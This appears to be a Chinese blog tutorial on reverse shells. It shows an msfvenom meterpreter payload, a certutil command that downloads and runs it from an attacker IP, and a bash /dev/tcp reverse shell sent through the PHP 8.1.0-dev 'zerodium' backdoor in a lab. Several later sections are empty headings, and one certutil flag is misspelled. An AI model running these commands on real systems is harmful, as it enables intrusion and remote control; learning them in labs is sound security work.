反弹shell
(0)

基础知识

  • 反弹shell
    目标机主动连接攻击机,攻击机与目标机建立网络连接(监听端口),并且攻击机可以操作目标机的输入输出。

目标机器要能够执行恶意命令,能够在目标机器上执行构造好的恶意命令或文件,这样让攻击机获得反向连接

    • bind shell
    1. shell是攻击者在攻击机对目标机进行攻击,建立会话。

    使用Metasploit生成reverse shell

    Get Reverse-shell via Windows one-liner

    msfvenom是Metasploit提供的生成一句话反弹shell的工具。使用时要选择目标机的种类(WindowsLinux)、木马种类,主机和端口

    实例-Certutil.exe
    certutil是Windows的系统工具,可以转存配置信息和payload.exe文件

    攻击机:

     msfvenom -p windows/meterpreter/reverse_tcp 
     LHOST=192.168.61.129 
     LPORT=4444 -f exe -o payload.exe
    

    生成的payload要在目标机可以访问的url路径下
    然后开始本地监听:

    目标机:

      certutil.exe -urlache -split -f 
     http://192.168.61.129/payload.exe payload.exe & payload.exe
    

    使用Bash反弹shell

    目标机器是Linux。是/bin/目录下的二进制程序,比如lsmvcp等

    • PHP 8.1.0-dev
      这个是一个靶场中的一个题,可以发送User-Agentt执行任意代码(需要有字段zerodium)

    攻击机先开启本地监听:

     nc -lvvp 2333

    目标机执行命令:

     User-Agentt:zerodiumsystem("/bin/bash -c 'bash -i 
     >&/dev/tcp/192.168.61.129/2333 0>&1'")
    

    使用netcat反弹shell

    • netcat

    netcat在Linux下使用,容易被其他程序启用,而且容易建立连接。在两台电脑上建立连接,返回两个数据流
    -l为监听模式,管控传入的资料
    -v为显示指令执行过程
    -p<通信端口>设置本地主机使用的通信端口
    e 后面的参数是创建连接后执行的程序
    在Linux下自带工具,但是-e功能被删除,下面参考链接有具体操作

    使用socat反弹shell

    • Socket CAT
      功能与netcat类似

    使用powercat反弹shell

    使用OpenSSL反弹加密shell

    参考链接:
    反弹Shell,看这一篇就够了
    教你玩转反弹shell

    本文为作者hackerbo.com发布,未经允许禁止转载!
    上一篇 下一篇
    评论
    暂无评论 >_<
    加入评论